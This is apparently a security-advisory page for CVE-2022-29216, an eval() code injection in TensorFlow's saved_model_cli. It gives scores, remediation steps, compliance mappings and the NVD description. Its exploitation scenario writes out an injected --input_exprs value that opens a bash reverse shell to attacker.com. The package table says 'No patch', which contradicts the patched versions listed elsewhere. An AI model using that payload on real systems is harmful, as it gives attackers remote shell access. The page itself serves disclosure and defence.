CVE-2022-29216 — HIGH (CVSS 7.8) AI Security Vulnerability

CISO Take

TensorFlow's saved_model_cli tool passed user-supplied arguments directly to eval() without sanitization, enabling local code execution and reverse shell access. The attack requires local access and user interaction with the CLI, limiting blast radius to developer workstations and MLOps pipelines. Patch immediately to TensorFlow 2.9.0, 2.8.1, 2.7.2, or 2.6.4 — any ML engineer running older TF versions in a shared build environment is exposed.

Risk Assessment

High severity (CVSS 7.8) but practical risk is bounded by the local attack vector. The primary exposure is in shared ML development environments, CI/CD pipelines, and MLOps tooling where saved_model_cli is invoked with user-controlled arguments. Containerized training jobs that accept external model paths and run saved_model_cli for validation are the highest-risk scenario. Not in CISA KEV, no confirmed active exploitation, but the technique (eval injection) is trivial to execute once local access is achieved.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
tensorflow	pip	—	No patch
195.0K OpenSSF 7.2 3.7K dependents Pushed today 4% patched ~1372d to patch Full package profile →

Do you use tensorflow? You're affected.

Severity & Risk

CVSS 3.1

7.8 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 38% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Local

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

Upgrade to TensorFlow 2.9.0, 2.8.1, 2.7.2, or 2.6.4 — the fix removes safe=False from the eval call entirely.
Audit CI/CD pipelines and MLOps scripts for saved_model_cli invocations that accept external or user-supplied arguments.
In the interim, avoid passing untrusted input as tensor values to saved_model_cli.
Enforce least-privilege on ML build agents — containerized pipelines should not have network egress that would enable a reverse shell to call home.
Review any wrapper scripts that invoke saved_model_cli with model artifacts from external sources (e.g., model registries, S3 buckets).

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Inference AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

6.1.2 - AI risk assessment 8.4 - AI system technical design and development

NIST AI RMF

GOVERN 6.2 - Policies and procedures are in place for the secure development of AI systems MANAGE 2.2 - Mechanisms are in place to sustain the value of deployed AI systems

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2022-29216?

TensorFlow's saved_model_cli tool passed user-supplied arguments directly to eval() without sanitization, enabling local code execution and reverse shell access. The attack requires local access and user interaction with the CLI, limiting blast radius to developer workstations and MLOps pipelines. Patch immediately to TensorFlow 2.9.0, 2.8.1, 2.7.2, or 2.6.4 — any ML engineer running older TF versions in a shared build environment is exposed.

Is CVE-2022-29216 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2022-29216, increasing the risk of exploitation.

How to fix CVE-2022-29216?

1. Upgrade to TensorFlow 2.9.0, 2.8.1, 2.7.2, or 2.6.4 — the fix removes safe=False from the eval call entirely. 2. Audit CI/CD pipelines and MLOps scripts for saved_model_cli invocations that accept external or user-supplied arguments. 3. In the interim, avoid passing untrusted input as tensor values to saved_model_cli. 4. Enforce least-privilege on ML build agents — containerized pipelines should not have network egress that would enable a reverse shell to call home. 5. Review any wrapper scripts that invoke saved_model_cli with model artifacts from external sources (e.g., model registries, S3 buckets).

What systems are affected by CVE-2022-29216?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps tooling, CI/CD for ML.

What is the CVSS score for CVE-2022-29216?

CVE-2022-29216 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.17%.

Technical Details

NVD Description

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow's `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.

Exploitation Scenario

An adversary with local access to a developer workstation or CI/CD build agent crafts a malicious numpy expression as a tensor input argument to saved_model_cli (e.g., --input_exprs 'input=__import__("os").system("bash -i >& /dev/tcp/attacker.com/4444 0>&1")'). When the engineer or automated pipeline runs model validation with this argument, the eval() call executes the injected code, opening a reverse shell back to the attacker. In a shared MLOps environment, this could allow lateral movement from a compromised model artifact repository into the build infrastructure.